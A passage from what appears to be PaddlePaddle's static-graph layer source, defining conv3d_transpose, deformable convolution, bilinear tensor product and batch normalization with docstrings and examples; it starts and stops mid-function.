will be consistent with that of the input. An optional string from: `"NCDHW"`, `"NDHWC"`.
The default is `"NCDHW"`. When it is `"NCDHW"`, the data is stored in the order of:
`[batch_size, input_channels, input_depth, input_height, input_width]`.
Returns:
A Tensor representing the conv3d_transpose, whose data
type is the same as the input and whose shape is (num_batches, channels, out_d, out_h,
out_w) or (num_batches, out_d, out_h, out_w, channels). If act is None, the tensor
variable stores the transposed convolution result; if act is not None, the tensor
variable stores the transposed convolution followed by the non-linear activation.
Raises:
ValueError: If the type of `use_cudnn` is not bool.
ValueError: If `data_format` is not "NCDHW" or "NDHWC".
ValueError: If `padding` is a string, but not "SAME" or "VALID".
ValueError: If `padding` is a tuple, but the element corresponding to the input's batch size is not 0
or the element corresponding to the input's channel is not 0.
ValueError: If `output_size` and filter_size are None at the same time.
ShapeError: If the input is not 5-D Tensor.
ShapeError: If the input's dimension size and filter's dimension size not equal.
ShapeError: If the dimension size of input minus the size of `stride` is not 2.
ShapeError: If the number of input channels is not equal to filter's channels.
ShapeError: If the size of `output_size` is not equal to that of `stride`.
Examples:
.. code-block:: python
import paddle
import numpy as np
paddle.enable_static()
data = paddle.static.data(name='data', shape=[None, 3, 12, 32, 32], dtype='float32')
param_attr = paddle.framework.ParamAttr(name='conv3d.weight', initializer=paddle.nn.initializer.XavierNormal(), learning_rate=0.001)
res = paddle.static.nn.conv3d_transpose(input=data, num_filters=2, filter_size=3, act="relu", param_attr=param_attr)
place = paddle.CPUPlace()
exe = paddle.static.Executor(place)
exe.run(paddle.static.default_startup_program())
x = np.random.rand(1, 3, 12, 32, 32).astype("float32")
output = exe.run(feed={"data": x}, fetch_list=[res])
print(output)
"""
assert (
param_attr is not False
), "param_attr should not be False in conv3d_transpose."
if data_format not in ['NCDHW', 'NDHWC']:
raise ValueError(
"Param(data_format) of Op(paddle.static.nn.conv3d_transpose) got wrong value: received "
+ data_format
+ " but only NCDHW or NDHWC supported."
)
l_type = "conv3d_transpose"
helper = LayerHelper(l_type, **locals())
if not isinstance(input, Variable):
raise TypeError("Input of conv3d_transpose must be Tensor")
if len(input.shape) != 5:
raise ValueError(
"Input should be 5D tensor, but received input with the shape of {}".format(
input.shape
)
)
input_channel = (
input.shape[1] if data_format == 'NCDHW' else input.shape[-1]
)
stride = utils.convert_to_list(stride, 3, 'stride')
dilation = utils.convert_to_list(dilation, 3, 'dilation')
if not isinstance(use_cudnn, bool):
raise ValueError("use_cudnn should be True or False")
def _update_padding(padding, data_format):
def is_list_or_tuple(ele):
if isinstance(ele, list) or isinstance(ele, tuple):
return True
return False
if is_list_or_tuple(padding) and len(padding) == 5:
if is_list_or_tuple(padding[0]) and (data_format == "NCDHW"):
if not (padding[0] == [0, 0] and padding[1] == [0, 0]):
raise ValueError(
"Non-zero padding(%s) in the batch or channel dimensions "
"is not supported." % str(padding)
)
padding = padding[2:5]
padding = [ele for a_list in padding for ele in a_list]
elif is_list_or_tuple(padding[0]) and (data_format == "NDHWC"):
if not (padding[0] == [0, 0] and padding[4] == [0, 0]):
raise ValueError(
"Non-zero padding(%s) in the batch or channel dimensions "
"is not supported." % str(padding)
)
padding = padding[1:4]
padding = [ele for a_list in padding for ele in a_list]
padding = utils.convert_to_list(padding, 6, 'padding')
elif is_list_or_tuple(padding) and len(padding) == 6:
padding = utils.convert_to_list(padding, 6, 'padding')
else:
padding = utils.convert_to_list(padding, 3, 'padding')
padding = [
padding[0],
padding[0],
padding[1],
padding[1],
padding[2],
padding[2],
]
return padding
padding_algorithm = "EXPLICIT"
if isinstance(padding, str):
padding = padding.upper()
if padding not in ["SAME", "VALID"]:
raise ValueError(
"Unknown padding: '%s'. It can only be 'SAME' or 'VALID'."
% str(padding)
)
if padding == "VALID":
padding_algorithm = "VALID"
padding = [0, 0, 0, 0, 0, 0]
elif padding == "SAME":
padding_algorithm = "SAME"
padding = [0, 0, 0, 0, 0, 0]
padding = _update_padding(padding, data_format)
if filter_size is None:
if output_size is None:
raise ValueError("output_size must be set when filter_size is None")
if isinstance(output_size, int):
output_size = [output_size, output_size, output_size]
d_in = input.shape[2] if data_format == 'NCDHW' else input.shape[1]
h_in = input.shape[3] if data_format == 'NCDHW' else input.shape[2]
w_in = input.shape[4] if data_format == 'NCDHW' else input.shape[3]
filter_size_d = (
output_size[0]
- (d_in - 1) * stride[0]
+ padding[0]
+ padding[1]
- 1
) // dilation[0] + 1
filter_size_h = (
output_size[1]
- (h_in - 1) * stride[1]
+ padding[2]
+ padding[3]
- 1
) // dilation[1] + 1
filter_size_w = (
output_size[2]
- (w_in - 1) * stride[2]
+ padding[4]
+ padding[5]
- 1
) // dilation[2] + 1
filter_size = [filter_size_d, filter_size_h, filter_size_w]
else:
filter_size = utils.convert_to_list(
filter_size, 3, 'conv3d_transpose.filter_size'
)
if len(padding) == 6 and utils._is_symmetric_padding(padding, 3):
padding = [padding[0], padding[2], padding[4]]
if output_size is None:
output_size = []
elif isinstance(output_size, (list, tuple, int)):
output_size = utils.convert_to_list(output_size, 3, 'output_size')
else:
raise ValueError("output_size should be int, list[int] or tuple[int]")
groups = 1 if groups is None else groups
if groups <= 0:
raise ValueError(
"the groups of conv3d_transpose should be greater than 0. Received groups: {}".format(
groups
)
)
if num_filters % groups != 0:
raise ValueError(
"Attr(num_filters) must be divisible by groups,"
"Received: Attr(num_filters) is {}, the groups is {}".format(
num_filters, groups
)
)
filter_shape = [input_channel, num_filters // groups] + filter_size
img_filter = helper.create_parameter(
dtype=input.dtype, shape=filter_shape, attr=helper.param_attr
)
if data_format == 'NCDHW':
data_format = 'NCHW'
if data_format == 'NDHWC':
data_format = 'NHWC'
pre_bias = helper.create_variable_for_type_inference(dtype=input.dtype)
helper.append_op(
type=l_type,
inputs={'Input': [input], 'Filter': [img_filter]},
outputs={'Output': pre_bias},
attrs={
'output_size': output_size,
'strides': stride,
'paddings': padding,
'padding_algorithm': padding_algorithm,
'dilations': dilation,
'groups': groups,
'use_cudnn': use_cudnn,
'data_format': data_format,
},
)
if data_format == 'NCHW':
pre_act = helper.append_bias_op(pre_bias, dim_start=1, dim_end=2)
else:
pre_act = helper.append_bias_op(pre_bias, dim_start=4, dim_end=5)
out = helper.append_activation(pre_act)
return out
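# --- Illustrative sanity check (hypothetical helper, not a Paddle API) ----------------
# Re-states the conv3d_transpose output-size formula from the docstring above in plain
# Python; each of depth/height/width is handled independently.
def _example_transpose_out_len(in_len, stride, pad, dilation, k):
    return (in_len - 1) * stride - 2 * pad + dilation * (k - 1) + 1
# e.g. a depth-12 input with a 3x3x3 kernel, stride 1 and no padding grows to depth 14:
# _example_transpose_out_len(12, stride=1, pad=0, dilation=1, k=3) == 14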
def deformable_conv(
input,
offset,
mask,
num_filters,
filter_size,
stride=1,
padding=0,
dilation=1,
groups=None,
deformable_groups=None,
im2col_step=None,
param_attr=None,
bias_attr=None,
modulated=True,
name=None,
):
r"""
**Deformable Convolution op**
Compute 2-D deformable convolution on 4-D input.
Given input image x, output feature map y, the deformable convolution operation can be expressed as follow:
Deformable Convolution v2:
.. math::
y(p) = \sum_{k=1}^{K}{w_k * x(p + p_k + \Delta p_k) * \Delta m_k}
Deformable Convolution v1:
.. math::
y(p) = \sum_{k=1}^{K}{w_k * x(p + p_k + \Delta p_k)}
Where :math:`\Delta p_k` and :math:`\Delta m_k` are the learnable offset and modulation scalar for the k-th location,
and :math:`\Delta m_k` is fixed to one in deformable convolution v1. Please refer to `Deformable ConvNets v2: More Deformable, Better Results
<https://arxiv.org/abs/1811.11168v2>`_ and `Deformable Convolutional Networks <https://arxiv.org/abs/1703.06211>`_.
Example:
- Input:
Input shape: :math:`(N, C_{in}, H_{in}, W_{in})`
Filter shape: :math:`(C_{out}, C_{in}, H_f, W_f)`
Offset shape: :math:`(N, 2 * deformable\_groups * H_f * W_f, H_{in}, W_{in})`
Mask shape: :math:`(N, deformable\_groups * H_f * W_f, H_{in}, W_{in})`
- Output:
Output shape: :math:`(N, C_{out}, H_{out}, W_{out})`
Where
.. math::
H_{out}&= \frac{(H_{in} + 2 * paddings[0] - (dilations[0] * (H_f - 1) + 1))}{strides[0]} + 1 \\
W_{out}&= \frac{(W_{in} + 2 * paddings[1] - (dilations[1] * (W_f - 1) + 1))}{strides[1]} + 1
Args:
input (Tensor): The input image with [N, C, H, W] format. A Tensor with type
float32, float64.
offset (Tensor): The input coordinate offset of deformable convolution layer.
A Tensor with type float32, float64.
mask (Tensor, Optional): The input mask of deformable convolution layer.
A Tensor with type float32, float64. It should be None when you use
deformable convolution v1.
num_filters(int): The number of filters. It is the same as the number of output
image channels.
filter_size (int|tuple): The filter size. If filter_size is a tuple,
it must contain two integers, (filter_size_H, filter_size_W).
Otherwise, the filter will be a square.
stride (int|tuple): The stride size. If stride is a tuple, it must
contain two integers, (stride_H, stride_W). Otherwise, the
stride_H = stride_W = stride. Default: stride = 1.
padding (int|tuple): The padding size. If padding is a tuple, it must
contain two integers, (padding_H, padding_W). Otherwise, the
padding_H = padding_W = padding. Default: padding = 0.
dilation (int|tuple): The dilation size. If dilation is a tuple, it must
contain two integers, (dilation_H, dilation_W). Otherwise, the
dilation_H = dilation_W = dilation. Default: dilation = 1.
groups (int): The groups number of the deformable conv layer. According to
grouped convolution in Alex Krizhevsky's Deep CNN paper: when group=2,
the first half of the filters is only connected to the first half
of the input channels, while the second half of the filters is only
connected to the second half of the input channels. Default: groups=1.
deformable_groups (int): The number of deformable group partitions.
Default: deformable_groups = 1.
im2col_step (int): Maximum number of images per im2col computation;
The total batch size should be divisible by this value or smaller
than this value; if you face an out-of-memory problem, you can try
to use a smaller value here.
Default: im2col_step = 64.
param_attr (ParamAttr, Optional): The parameter attribute for learnable parameters/weights
of deformable conv. If it is set to None or one attribute of ParamAttr,
deformable conv will create ParamAttr as param_attr.
If the Initializer of the param_attr is not set, the parameter is
initialized with :math:`Normal(0.0, std)`, and the
:math:`std` is :math:`(\frac{2.0}{filter\_elem\_num})^{0.5}`. Default: None.
bias_attr (ParamAttr|bool, Optional): The parameter attribute for the bias of
deformable conv layer. If it is set to False, no bias will be added
to the output units. If it is set to None or one attribute of ParamAttr, conv2d
will create ParamAttr as bias_attr. If the Initializer of the bias_attr
is not set, the bias is initialized zero. Default: None.
modulated (bool): Whether to use the modulated (v2) version of deformable convolution;
v2 is used when True and v1 when False. Default: True.
name(str, Optional): For details, please refer to :ref:`api_guide_Name`.
Generally, no setting is required. Default: None.
Returns:
Tensor: The tensor variable storing the deformable convolution \
result. A Tensor with type float32, float64.
Examples:
.. code-block:: python
#deformable conv v2:
import paddle
paddle.enable_static()
C_in, H_in, W_in = 3, 32, 32
filter_size, deformable_groups = 3, 1
data = paddle.static.data(name='data', shape=[None, C_in, H_in, W_in], dtype='float32')
offset = paddle.static.data(name='offset', shape=[None, 2*deformable_groups*filter_size**2, H_in, W_in], dtype='float32')
mask = paddle.static.data(name='mask', shape=[None, deformable_groups*filter_size**2, H_in, W_in], dtype='float32')
out = paddle.static.layers.common.deformable_conv(input=data, offset=offset, mask=mask,
num_filters=2, filter_size=filter_size, padding=1, modulated=True)
#deformable conv v1:
import paddle
C_in, H_in, W_in = 3, 32, 32
filter_size, deformable_groups = 3, 1
data = paddle.static.data(name='data', shape=[None, C_in, H_in, W_in], dtype='float32')
offset = paddle.static.data(name='offset', shape=[None, 2*deformable_groups*filter_size**2, H_in, W_in], dtype='float32')
out = paddle.static.layers.common.deformable_conv(input=data, offset=offset, mask=None,
num_filters=2, filter_size=filter_size, padding=1, modulated=False)
"""
check_variable_and_dtype(
input, "input", ['float32', 'float64'], 'deformable_conv'
)
check_variable_and_dtype(
offset, "offset", ['float32', 'float64'], 'deformable_conv'
)
check_type(
mask, 'mask', (paddle.static.Variable, type(None)), 'deformable_conv'
)
num_channels = input.shape[1]
assert param_attr is not False, "param_attr should not be False here."
helper = LayerHelper('deformable_conv', **locals())
dtype = helper.input_dtype()
if not isinstance(input, paddle.static.Variable):
raise TypeError("Input of deformable_conv must be Tensor")
if not isinstance(offset, paddle.static.Variable):
raise TypeError("Input Offset of deformable_conv must be Tensor")
if groups is None:
num_filter_channels = num_channels
else:
if num_channels % groups != 0:
raise ValueError("num_channels must be divisible by groups.")
num_filter_channels = num_channels // groups
filter_size = utils.convert_to_list(filter_size, 2, 'filter_size')
stride = utils.convert_to_list(stride, 2, 'stride')
padding = utils.convert_to_list(padding, 2, 'padding')
dilation = utils.convert_to_list(dilation, 2, 'dilation')
input_shape = input.shape
filter_shape = [num_filters, int(num_filter_channels)] + filter_size
def _get_default_param_initializer():
filter_elem_num = filter_size[0] * filter_size[1] * num_channels
if filter_elem_num <= 0:
raise ValueError(
"Invalid filter number, excepted number is larger than 0, but"
" received {}, please check the input shape and "
"filter size.".format(filter_elem_num)
)
std = (2.0 / filter_elem_num) ** 0.5
return paddle.nn.initializer.normal.NormalInitializer(0.0, std, 0)
filter_param = helper.create_parameter(
attr=helper.param_attr,
shape=filter_shape,
dtype=dtype,
default_initializer=_get_default_param_initializer(),
)
pre_bias = helper.create_variable_for_type_inference(dtype)
if modulated:
helper.append_op(
type='deformable_conv',
inputs={
'Input': input,
'Filter': filter_param,
'Offset': offset,
'Mask': mask,
},
outputs={"Output": pre_bias},
attrs={
'strides': stride,
'paddings': padding,
'dilations': dilation,
'groups': groups,
'deformable_groups': deformable_groups,
'im2col_step': im2col_step,
},
)
else:
helper.append_op(
type='deformable_conv_v1',
inputs={
'Input': input,
'Filter': filter_param,
'Offset': offset,
},
outputs={"Output": pre_bias},
attrs={
'strides': stride,
'paddings': padding,
'dilations': dilation,
'groups': groups,
'deformable_groups': deformable_groups,
'im2col_step': im2col_step,
},
)
output = helper.append_bias_op(pre_bias, dim_start=1, dim_end=2)
return output
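# --- Illustrative sketch (hypothetical helper, not a Paddle API) ----------------------
# Computes the channel counts that the `offset` and `mask` inputs of deformable_conv
# above must have, following the shapes documented in its docstring.
def _example_deformable_aux_channels(filter_h, filter_w, deformable_groups=1):
    offset_channels = 2 * deformable_groups * filter_h * filter_w  # (dx, dy) per kernel point
    mask_channels = deformable_groups * filter_h * filter_w        # one scalar per kernel point (v2 only)
    return offset_channels, mask_channels
# e.g. a 3x3 kernel with one deformable group needs 18 offset channels and 9 mask channels.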
@static_only
def deform_conv2d(
x,
offset,
mask,
num_filters,
filter_size,
stride=1,
padding=0,
dilation=1,
groups=1,
deformable_groups=1,
im2col_step=1,
weight_attr=None,
bias_attr=None,
name=None,
):
r"""
Compute 2-D deformable convolution on 4-D input.
Given input image x, output feature map y, the deformable convolution operation can be expressed as follow:
Deformable Convolution v2:
.. math::
y(p) = \sum_{k=1}^{K}{w_k * x(p + p_k + \Delta p_k) * \Delta m_k}
Deformable Convolution v1:
.. math::
y(p) = \sum_{k=1}^{K}{w_k * x(p + p_k + \Delta p_k)}
Where :math:`\Delta p_k` and :math:`\Delta m_k` are the learnable offset and modulation scalar for the k-th location,
and :math:`\Delta m_k` is fixed to one in deformable convolution v1. Please refer to `Deformable ConvNets v2: More Deformable, Better Results
<https://arxiv.org/abs/1811.11168v2>`_ and `Deformable Convolutional Networks <https://arxiv.org/abs/1703.06211>`_.
Example:
- Input:
X shape: :math:`(N, C_{in}, H_{in}, W_{in})`
Filter shape: :math:`(C_{out}, C_{in}, H_f, W_f)`
Offset shape: :math:`(N, 2 * deformable\_groups * H_f * W_f, H_{in}, W_{in})`
Mask shape: :math:`(N, deformable\_groups * H_f * W_f, H_{in}, W_{in})`
- Output:
Output shape: :math:`(N, C_{out}, H_{out}, W_{out})`
Where
.. math::
H_{out}&= \frac{(H_{in} + 2 * paddings[0] - (dilations[0] * (H_f - 1) + 1))}{strides[0]} + 1 \\
W_{out}&= \frac{(W_{in} + 2 * paddings[1] - (dilations[1] * (W_f - 1) + 1))}{strides[1]} + 1
Args:
x (Tensor): The input image with [N, C, H, W] format. A Tensor with type
float32, float64.
offset (Tensor): The input coordinate offset of deformable convolution layer.
A Tensor with type float32, float64.
mask (Tensor, Optional): The input mask of deformable convolution layer.
A Tensor with type float32, float64. It should be None when you use
deformable convolution v1.
num_filters(int): The number of filters. It is the same as the number of output
image channels.
filter_size (int|list|tuple): The filter size. If filter_size is a list/tuple,
it must contain two integers, (filter_size_H, filter_size_W).
Otherwise, the filter will be a square.
stride (int|list|tuple, Optional): The stride size. If stride is a list/tuple, it must
contain two integers, (stride_H, stride_W). Otherwise, the
stride_H = stride_W = stride. Default: stride = 1.
padding (int|list|tuple, Optional): The padding size. If padding is a list/tuple, it must
contain two integers, (padding_H, padding_W). Otherwise, the
padding_H = padding_W = padding. Default: padding = 0.
dilation (int|list|tuple, Optional): The dilation size. If dilation is a list/tuple, it must
contain two integers, (dilation_H, dilation_W). Otherwise, the
dilation_H = dilation_W = dilation. Default: dilation = 1.
groups (int, Optional): The groups number of the deformable conv layer. According to
grouped convolution in Alex Krizhevsky's Deep CNN paper: when group=2,
the first half of the filters is only connected to the first half
of the input channels, while the second half of the filters is only
connected to the second half of the input channels. Default: groups=1.
deformable_groups (int, Optional): The number of deformable group partitions.
Default: deformable_groups = 1.
im2col_step (int, Optional): Maximum number of images per im2col computation;
The total batch size should be divisible by this value or smaller
than this value; if you face an out-of-memory problem, you can try
to use a smaller value here.
Default: im2col_step = 1.
weight_attr (ParamAttr, Optional): The parameter attribute for learnable parameters/weights
of deformable conv. If it is set to None or one attribute of ParamAttr,
deformable conv will create ParamAttr as weight_attr.
If the Initializer of the weight_attr is not set, the parameter is
initialized with :math:`Normal(0.0, std)`, and the
:math:`std` is :math:`(\frac{2.0}{filter\_elem\_num})^{0.5}`. Default: None.
bias_attr (ParamAttr|bool, Optional): The parameter attribute for the bias of
deformable conv layer. If it is set to False, no bias will be added
to the output units. If it is set to None or one attribute of ParamAttr, conv2d
will create ParamAttr as bias_attr. If the Initializer of the bias_attr
is not set, the bias is initialized zero. Default: None.
name(str, Optional): For details, please refer to :ref:`api_guide_Name`.
Generally, no setting is required. Default: None.
Returns:
Tensor: The tensor storing the deformable convolution \
result. A Tensor with type float32, float64.
Examples:
.. code-block:: python
#deformable conv v2:
import paddle
paddle.enable_static()
C_in, H_in, W_in = 3, 32, 32
filter_size, deformable_groups = 3, 1
data = paddle.static.data(name='data', shape=[None, C_in, H_in, W_in], dtype='float32')
offset = paddle.static.data(name='offset', shape=[None, 2*deformable_groups*filter_size**2, H_in, W_in], dtype='float32')
mask = paddle.static.data(name='mask', shape=[None, deformable_groups*filter_size**2, H_in, W_in], dtype='float32')
out = paddle.static.nn.deform_conv2d(x=data, offset=offset, mask=mask,
num_filters=2, filter_size=filter_size, padding=1)
#deformable conv v1:
import paddle
paddle.enable_static()
C_in, H_in, W_in = 3, 32, 32
filter_size, deformable_groups = 3, 1
data = paddle.static.data(name='data', shape=[None, C_in, H_in, W_in], dtype='float32')
offset = paddle.static.data(name='offset', shape=[None, 2*deformable_groups*filter_size**2, H_in, W_in], dtype='float32')
out = paddle.static.nn.deform_conv2d(x=data, offset=offset, mask=None,
num_filters=2, filter_size=filter_size, padding=1)
"""
if mask is None:
return deformable_conv(
input=x,
offset=offset,
mask=mask,
num_filters=num_filters,
filter_size=filter_size,
stride=stride,
padding=padding,
dilation=dilation,
groups=groups,
deformable_groups=deformable_groups,
im2col_step=im2col_step,
param_attr=weight_attr,
bias_attr=bias_attr,
modulated=False,
name=name,
)
else:
return deformable_conv(
input=x,
offset=offset,
mask=mask,
num_filters=num_filters,
filter_size=filter_size,
stride=stride,
padding=padding,
dilation=dilation,
groups=groups,
deformable_groups=deformable_groups,
im2col_step=im2col_step,
param_attr=weight_attr,
bias_attr=bias_attr,
modulated=True,
name=name,
)
def bilinear_tensor_product(
x, y, size, act=None, name=None, param_attr=None, bias_attr=None
):
r"""
This layer performs bilinear tensor product on two inputs.
.. math::
out_{i} = x * W_{i} * {y^\mathrm{T}}, i=0,1,...,size-1
In this formula:
- :math:`x`: the first input contains M elements, shape is [batch_size, M].
- :math:`y`: the second input contains N elements, shape is [batch_size, N].
- :math:`W_{i}`: the i-th learned weight, shape is [M, N].
- :math:`out_{i}`: the i-th element of out, shape is [batch_size, size].
- :math:`y^\mathrm{T}`: the transpose of :math:`y`.
Args:
x (Tensor): 2-D input tensor with shape [batch_size, M]. Data type
is float32 or float64.
y (Tensor): 2-D input tensor with shape [batch_size, N]. Data type
should be same as **x**.
size (int): The dimension of this layer.
act (str|None): Activation to be applied to the output of this layer. Default None.
name(str|None): For detailed information, please refer to
:ref:`api_guide_Name` . Usually name is no need to set and None by default.
param_attr (ParamAttr|None): To specify the weight parameter attribute.
Default: None, which means the default weight parameter property is
used. See usage for details in :ref:`api_fluid_ParamAttr` .
bias_attr (ParamAttr|None): To specify the bias parameter attribute.
Default: None, which means the default bias parameter property is
used. See usage for details in :ref:`api_fluid_ParamAttr` .
Returns:
Tensor, A 2-D Tensor of shape [batch_size, size]. Data type is the same as input **x**.
Examples:
.. code-block:: python
import paddle
paddle.enable_static()
x = paddle.static.data("t1", shape=[-1, 5], dtype="float32")
y = paddle.static.data("t2", shape=[-1, 4], dtype="float32")
tensor = paddle.static.nn.bilinear_tensor_product(x, y, size=1000)
"""
helper = LayerHelper('bilinear_tensor_product', **locals())
dtype = helper.input_dtype('x')
param_shape = [size, x.shape[1], y.shape[1]]
w = helper.create_parameter(
attr=helper.param_attr, shape=param_shape, dtype=dtype, is_bias=False
)
out = helper.create_variable_for_type_inference(dtype=dtype)
inputs = {"X": x, "Y": y, "Weight": w}
if helper.bias_attr:
bias_size = [1, size]
bias = helper.create_parameter(
attr=helper.bias_attr, shape=bias_size, dtype=dtype, is_bias=True
)
inputs["Bias"] = bias
helper.append_op(
type="bilinear_tensor_product", inputs=inputs, outputs={"Out": out}
)
# add activation
return helper.append_activation(out)
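# --- NumPy reference sketch (illustrative only, not how the operator is implemented) --
# Mirrors the bilinear_tensor_product formula above: out_i = x * W_i * y^T.
# All names below are hypothetical.
import numpy as np
def _example_bilinear_reference(x, y, w, bias=None):
    # x: [batch, M], y: [batch, N], w: [size, M, N] -> out: [batch, size]
    out = np.einsum('bm,smn,bn->bs', x, w, y)
    if bias is not None:
        out = out + bias  # bias has shape [1, size] and broadcasts over the batch
    return out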
def batch_norm(
input,
act=None,
is_test=False,
momentum=0.9,
epsilon=1e-05,
param_attr=None,
bias_attr=None,
data_layout='NCHW',
in_place=False,
name=None,
moving_mean_name=None,
moving_variance_name=None,
do_model_average_for_mean_and_var=True,
use_global_stats=False,
):
r"""
**Batch Normalization Layer**
Can be used as a normalizer function for convolution or fully_connected operations.
The required data format for this layer is one of the following:
1. NHWC `[batch, in_height, in_width, in_channels]`
2. NCHW `[batch, in_channels, in_height, in_width]`
Refer to `Batch Normalization: Accelerating Deep Network Training by Reducing
Internal Covariate Shift <https://arxiv.org/pdf/1502.03167.pdf>`_
for more details.
:math:`input` is the input features over a mini-batch.
.. math::
\mu_{\beta} &\gets \frac{1}{m} \sum_{i=1}^{m} x_i \qquad &//\ mini-batch\ mean \\
\sigma_{\beta}^{2} &\gets \frac{1}{m} \sum_{i=1}^{m}(x_i - \mu_{\beta})^2 \qquad &//\ mini-batch\ variance \\
\hat{x_i} &\gets \frac{x_i - \mu_\beta} {\sqrt{\sigma_{\beta}^{2} + \epsilon}} \qquad &//\ normalize \\
y_i &\gets \gamma \hat{x_i} + \beta \qquad &//\ scale\ and\ shift \\
moving\_mean &= moving\_mean * momentum + mini\_batch\_mean * (1. - momentum) \\
moving\_var &= moving\_var * momentum + mini\_batch\_var * (1. - momentum)
moving_mean is the global mean and moving_var is the global variance.
When use_global_stats = True, :math:`\mu_{\beta}`
and :math:`\sigma_{\beta}^{2}` are not the statistics of one mini-batch.
They are global (or running) statistics, usually obtained from a
pre-trained model.
Training and testing (or inference) then share the same behavior:
.. math::
\hat{x_i} &\gets \frac{x_i - \mu_\beta} {\sqrt{\sigma_{\beta}^{2} + \epsilon}} \\
y_i &\gets \gamma \hat{x_i} + \beta
Note:
if build_strategy.sync_batch_norm=True, the batch_norm in network will use
sync_batch_norm automatically.
`is_test = True` can only be used in test and inference programs; `is_test` CANNOT be set to True in a train program. If you want to use the global statistics from a pre-trained model in a train program, please set `use_global_stats = True`.
Args:
input(Tensor): The rank of input Tensor can be 2, 3, 4, 5. The data type
is float16 or float32 or float64.
act(string, Default None): Activation type, linear|relu|prelu|...
is_test (bool, Default False): A flag indicating whether it is in
test phase or not.
momentum(float|Tensor, Default 0.9): The value used for the moving_mean and
moving_var computation. This should be a float number or a Tensor with
shape [1] and data type as float32. The updated formula is:
:math:`moving\_mean = moving\_mean * momentum + new\_mean * (1. - momentum)`
:math:`moving\_var = moving\_var * momentum + new\_var * (1. - momentum)`
Default is 0.9.
epsilon(float, Default 1e-05): A value added to the denominator for
numerical stability. Default is 1e-5.
param_attr(ParamAttr|None): The parameter attribute for Parameter `scale`
of batch_norm. If it is set to None or one attribute of ParamAttr, batch_norm
will create ParamAttr as param_attr, the name of scale can be set in ParamAttr.
If the Initializer of the param_attr is not set, the parameter is initialized
with Xavier. Default: None.
bias_attr(ParamAttr|None): The parameter attribute for the bias of batch_norm.
If it is set to None or one attribute of ParamAttr, batch_norm
will create ParamAttr as bias_attr, the name of bias can be set in ParamAttr.
If the Initializer of the bias_attr is not set, the bias is initialized zero.
Default: None.
data_layout (str, optional): Specify the data format of the input, and the data format of the output
will be consistent with that of the input. An optional string from: `"NCHW"`, `"NHWC"`.
The default is `"NCHW"`. When it is `"NCHW"`, the data is stored in the order of:
`[batch_size, input_channels, input_height, input_width]`.
in_place(bool, Default False): Make the input and output of batch norm reuse memory.
name(str|None): For detailed information, please refer to :ref:`api_guide_Name`.
Usually name is no need to set and None by default.
moving_mean_name(str, Default None): The name of moving_mean which store the global Mean. If it
is set to None, batch_norm will save global mean with a random name, otherwise, batch_norm
will save global mean with the string.
moving_variance_name(str, Default None): The name of the moving_variance which store the global Variance.
If it is set to None, batch_norm will save global variance with a random name, otherwise, batch_norm
will save global variance with the string.
do_model_average_for_mean_and_var(bool, Default True): Whether parameter mean and variance should do model
average when model average is enabled.
use_global_stats(bool, Default False): Whether to use global mean and
variance. In inference or test mode, set use_global_stats to true
or is_test to true, and the behavior is equivalent.
In train mode, when setting use_global_stats True, the global mean
and variance are also used during train period.
Returns:
A Tensor which is the result after applying batch normalization on the input,
has same shape and data type with input.
Examples:
.. code-block:: python
import paddle
paddle.enable_static()
x = paddle.static.data(name='x', shape=[3, 7, 3, 7], dtype='float32')
hidden1 = paddle.static.nn.fc(x=x, size=200)
print(hidden1.shape)
# [3, 200]
hidden2 = paddle.static.nn.batch_norm(input=hidden1)
print(hidden2.shape)
# [3, 200]
"""
assert (
bias_attr is not False
), "bias_attr should not be False in batch_norm."
helper = LayerHelper('batch_norm', **locals())
check_variable_and_dtype(
input, 'input', ['float16', 'float32', 'float64'], 'batch_norm'
)
dtype = helper.input_dtype()
# use fp32 for bn parameter
if dtype == core.VarDesc.VarType.FP16:
dtype = core.VarDesc.VarType.FP32
input_shape = input.shape
if data_layout == 'NCHW':
channel_num = input_shape[1]
else:
if data_layout == 'NHWC':
channel_num = input_shape[-1]
else:
raise ValueError("unsupported data layout:" + data_layout)
param_shape = [channel_num]
# create parameter
scale = helper.create_parameter(
attr=helper.param_attr,
shape=param_shape,
dtype=dtype,
default_initializer=paddle.fluid.initializer.Constant(1.0),
)
bias = helper.create_parameter(
attr=helper.bias_attr, shape=param_shape, dtype=dtype, is_bias=True
)
mean = helper.create_parameter(
attr=paddle.ParamAttr(
name=moving_mean_name,
initializer=paddle.fluid.initializer.Constant(0.0),
trainable=False,
do_model_average=do_model_average_for_mean_and_var,
),
shape=param_shape,
dtype=dtype,
)
mean.stop_gradient = True
variance = helper.create_parameter(
attr=paddle.ParamAttr(
name=moving_variance_name,
initializer=paddle.fluid.initializer.Constant(1.0),
trainable=False,
do_model_average=do_model_average_for_mean_and_var,
),
shape=param_shape,
dtype=dtype,
)
variance.stop_gradient = True
# create output
# mean and mean_out share the same memory
mean_out = mean
# variance and variance_out share the same memory
variance_out = variance
if _non_static_mode():
inputs_has_MomemtumTensor = False
attrs_has_momentum = False
tmp_tensor_type = core.eager.Tensor
if isinstance(momentum, tmp_tensor_type):
inputs_has_MomemtumTensor = True
else:
attrs_has_momentum = True
attrs_ = ()
if attrs_has_momentum:
attrs_ = (
'momentum',
momentum,
'epsilon',
epsilon,
'is_test',
is_test,
'data_layout',
data_layout,
'use_mkldnn',
False,
'fuse_with_relu',
False,
'use_global_stats',
use_global_stats,
)
else:
attrs_ = (
'epsilon',
epsilon,
'is_test',
is_test,
'data_layout',
data_layout,
'use_mkldnn',
False,
'fuse_with_relu',
False,
'use_global_stats',
use_global_stats,
)
if inputs_has_MomemtumTensor:
batch_norm_out, _, _, _, _, _ = paddle._legacy_C_ops.batch_norm(
input,
scale,
bias,
mean,
variance,
momentum,
mean_out,
variance_out,
*attrs_,
)
else:
batch_norm_out, _, _, _, _, _ = paddle._legacy_C_ops.batch_norm(
input,
scale,
bias,
mean,
variance,
None,
mean_out,
variance_out,
*attrs_,
)
return paddle.fluid.dygraph_utils._append_activation_in_dygraph(
batch_norm_out, act=act, use_mkldnn=False
)
saved_mean = helper.create_variable_for_type_inference(
dtype=dtype, stop_gradient=True
)
saved_variance = helper.create_variable_for_type_inference(
dtype=dtype, stop_gradient=True
)
reserve_space = None
if not is_test:
reserve_space = helper.create_variable_for_type_inference(
dtype=helper.input_dtype(), stop_gradient=True
)
batch_norm_out = (
input if in_place else helper.create_variable_for_type_inference(dtype)
)
inputs = {
"X": input,
"Scale": scale,
"Bias": bias,
"Mean": mean,
"Variance": variance,
"MeanOut": mean_out,
"VarianceOut": variance_out,
}
attrs = {
"epsilon": epsilon,
"is_test": is_test,
"data_layout": data_layout,
